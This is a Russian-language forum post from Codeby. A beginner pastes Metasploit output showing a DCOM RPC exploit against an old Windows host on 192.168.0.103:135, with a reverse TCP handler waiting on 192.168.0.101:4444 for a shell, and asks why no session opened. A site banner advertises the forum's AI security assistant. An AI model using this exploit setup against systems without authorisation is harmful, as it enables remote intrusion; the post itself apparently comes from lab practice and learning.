• Новый бот-ассистент на форуме Codeby

    Теперь на форуме работает ИИ-помощник @bot_cdb — твой технический ассистент по информационной безопасности. Просто упомяни @bot_cdb в любой теме, и получишь быстрый ответ на вопросы по CVE, инструментам, техникам атак и защиты. Бот анализирует весь тред перед ответом, проверяет актуальность данных и может предложить дополнительную помощь. Особенно полезен для проверки технических деталей, поиска документации и быстрых консультаций по пентесту, малвари, форензике и другим областям ИБ.

На кали пытаюсь запустить эксплойт, вроде как все норм настроил (запускаю через Кали) По итогу ничего не работает. Начинающий в этом деле, помогите пж

  • Автор темы Автор темы MegDog
  • Дата начала Дата начала

MegDog

New member
18.12.2022
1
0
Started reverse TCP handler on 192.168.0.101:4444
[*] 192.168.0.103:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.103:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.103[135] ...
[*] 192.168.0.103:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Exploit completed, but no session was created.
===
Если нужны скрины вы попросите я вам скину
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab